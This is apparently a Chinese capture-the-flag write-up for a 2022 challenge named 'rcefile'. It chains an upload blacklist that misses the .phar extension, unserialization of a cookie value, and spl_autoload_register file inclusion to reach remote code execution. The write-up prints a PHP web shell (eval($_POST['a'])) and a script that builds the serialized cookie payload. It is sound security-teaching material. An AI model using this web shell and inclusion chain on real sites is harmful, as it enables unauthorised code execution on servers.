2022强网先锋 rcefile

环境下载地址

代码审计

spl_autoload_register 说明

image-20220817234937507

spl_autoload_register()在没有限制的情况,new有一个当前不存在的类test,spl_autoload_register会自动去当前目录下包含文件名为test.php 或者是test.inc

unserialize反序列化本地cookie[‘userfile’]

upload.php

在39行黑名单中并没有对 phar 后缀进行过滤

image-20220817234147354

上传文件 1.jpg 内容

1
2
3
4

<?php 

phpinfo();
eval($_POST['a']);

修改后缀 为 1.phar 并 查看图片获取重命名之后的图片名称

image-20220817234834576

image-20220818000313742

使用这个名称去构建一个序列化对象 ,config.inc.php去cookie里找,并进行反序列化。触发**spl_autoload_register()**去包含

afd4b9668ced586e2528dc1863a650fd.inc

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

<?php 

class afd4b9668ced586e2528dc1863a650fd{
    # 不能数字开头
	function __construst(){
}
}
$s = new afd4b9668ced586e2528dc1863a650fd();
echo serialize($s);

# O:32:"afd4b9668ced586e2528dc1863a650fd":0:{}

image-20220818000953651

image-20220818001040323